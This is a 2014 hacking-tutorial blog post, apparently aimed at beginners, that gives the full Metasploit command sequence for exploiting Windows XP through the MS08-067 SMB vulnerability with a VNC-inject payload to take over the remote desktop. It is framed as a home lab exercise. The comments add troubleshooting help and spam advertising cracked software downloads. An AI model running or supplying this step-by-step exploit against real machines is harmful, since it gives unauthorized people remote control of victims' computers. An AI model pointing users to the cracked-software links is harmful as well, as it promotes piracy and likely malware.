Saturday, April 12, 2014

Hacking Windows : Totally own it - Hollywood Style

Now while the real life hacking and the one in the movies might seem far from congruent, there is some similarity at least, and in this post, we'll get no shells, no meterpreter, no bullshit. We'll simply get the Windows XP desktop inside our Kali machine like we actually are on it. What we're actually getting is going to be something like this-




If you have any difficulty understanding whats going on, then that's because you skipped over 5 articles on penetration testing. You are recommended to go over last 3 atleast.

Starting metasploit

You must be having Kali Linux installed, follow the link if you haven't already got Kali Linux.

After that, execute the following commands on terminal to get Metasploit running
service postgresql start
service metasploit start
msfconsole
After this, you metasploit framework will start.

Information Gathering

  • Find IP of XP machine by running ipconfig on XP command prompt.
  • Find IP of Kali machine by running ifconfig on Kali terminal.

Hacking XP 

Now execute the following code (without the msf> it is there by already) -
msf > use exploit/windows/smb/ms08_067_netapi
It selects the netapi ms08 exploit which is well known for Windows XP. Now execute the following (everything before > will already be there)
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/bind_tcp 
 Now execute a show options to get an idea what all values need to be filled.
msf  exploit(ms08_067_netapi) >show options
You will need the information gathered from Information Gathering step. Remember - XP -> Remote host (RHOST). This is all we need. Just enter the XP IP instead of 192.168.xxx.xxx
msf  exploit(ms08_067_netapi) > set RHOST 192.168.xxx.xxx
That would be all. Now type exploit and press enter.
msf  exploit(ms08_067_netapi) > exploit
If everything goes right, then you'll have a pretty much movie kind of remote connection working for you, and you'll be able to work stuff like you'd normally do if you had access to the machine.

32 comments:

  1. Replies
    1. No known vulnerabilities in Windows 7. You'll have to attack the installed programs (Java/browsers/etc.)

      Delete
  2. Take a look at the java exploitation in windows 8 tutorial. It's there on the homepage of the blog, I wrote it recently.

    ReplyDelete
  3. hey mate it says attempting to trigger vulnerability
    and then it just stops at msf exploit(ms08_067_netapi and then i can only type

    ReplyDelete
  4. Ty very much mate i'll give it a shot today i tried to hack into my lap top wich is XP, but it didn't work.I guess i will just install VMware player and VMware tools then it will work :D.
    P.S:This blog is awesome, you are an awesome teacher thanks :D

    ReplyDelete
    Replies
    1. Remember to install a very old version of xp as the chances of being vulnerable to attacks is more in old versions.

      Delete
  5. Yeah but then for vulnerability, in newer versions i need to target something like java or that?right?

    ReplyDelete
  6. so so close this time but it says that the host is unreachable

    ReplyDelete
    Replies
    1. Some problems with networking. If pinging the host fails then it means your virtual LAN is not configured properly. Try using NAT (it does the hard job for us and auto-configures everything)

      Delete
  7. Yeah i am using windows 7 NAT wont work for soem reason on vmware neither would bridged

    ReplyDelete
    Replies
    1. Maybe your Windows XP firewall has a problem with the connection. Try disabling the firewall and try pinging again.

      Delete
    2. Soon you will have to have a whole computer dedicated for kali linux. I am serious.

      Delete
  8. Its just working on Windows XP WITHOUT Service Pack. Patched versions are NOT vulnerable for script kiddies like you

    ReplyDelete
  9. This is the message I got after trying it - Exploit failed - unreachable : Rex: connection timeout.

    ReplyDelete
  10. Can you present me any good books for beginner? :D

    ReplyDelete
  11. for me there is no attack menu when i right click a host :/

    ReplyDelete
    Replies
    1. oh sorry wrong tutorial :'D will post it again in the right one ^^

      Delete
  12. This blog is truly awesome in all aspects. 123 movies

    ReplyDelete
  13. Love the way magnificently every word is composed with legitimate adjust.
    jadwal film bioskop

    ReplyDelete
  14. Blue Iris Crack Free Download: Use up to 64 cameras (webcam, IP network camera, analog card, or Windows desktop). downloadblueiris

    ReplyDelete
  15. As an alternative to Partition Magic, AOMEI Partition Assistant Crack Download offers a wide range of tools on an easy-to-use interface, making it easy to manage your PC’s disk partitions and making it more secure than ever.aomeipartitionassistantcrack

    ReplyDelete
  16. PreSonus Studio One Crack Free Download adds many great features for artists, composers and producers. To celebrate the 10th anniversary of music recording software, PreSonus has announced the next major DAS update, PreSonus Studio One License Key.studioonekeygen

    ReplyDelete
  17. GOGOi – Downtempo Lounge Vol 2 (SERUM) Crack Download for xfer serum is GOGOi’s latest installation.gogoidowntempoloungevol2serum

    ReplyDelete
  18. Liven up your vision of music with Samplitude Music Studio Crack Download. Composition, recording, mixing, mastering. Create complex developments with innovative tools and object-oriented workflows.crackformagixsamplitudemusicstudio

    ReplyDelete
  19. VMware Workstation Pro Crack is the industry standard for running multiple operating systems on a single Linux or Windows computer. Workstation 16.0.0 Pro adds the leading desktop with new user interface management, support for Jumbo Frame, support for the latest Windows and Linux operating systems. vmwareworkstationfreetorrent

    ReplyDelete
  20. I really loved reading your blog. It was very well authored and easy to undertand. Unlike additional blogs I have read which are really not tht good. I also found your posts very interesting. In fact after reading, I had to go show it to my friend and he ejoyed it as well! windows shift s not working windows 11

    ReplyDelete
  21. You are prepared to have your video created, and you are going to pick a video creation organization to get it done. Production Videos

    ReplyDelete
  22. I really like this site, it's really great. I also visit your other articles and they are also very helpful, I am waiting for your next update because I like all your articles.

    ReplyDelete
  23. What about home theather, I am loving to watch ‘Maggie Season 1’ in Canada, actually It's my first experience but amazing and I also suggest to others.

    ReplyDelete
  24. Our experts deliver Shopify sites on time to maintain its efficiency.




    ReplyDelete
  25. You can easily create a database for positive words or adjectives to spread the positivity through words.

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.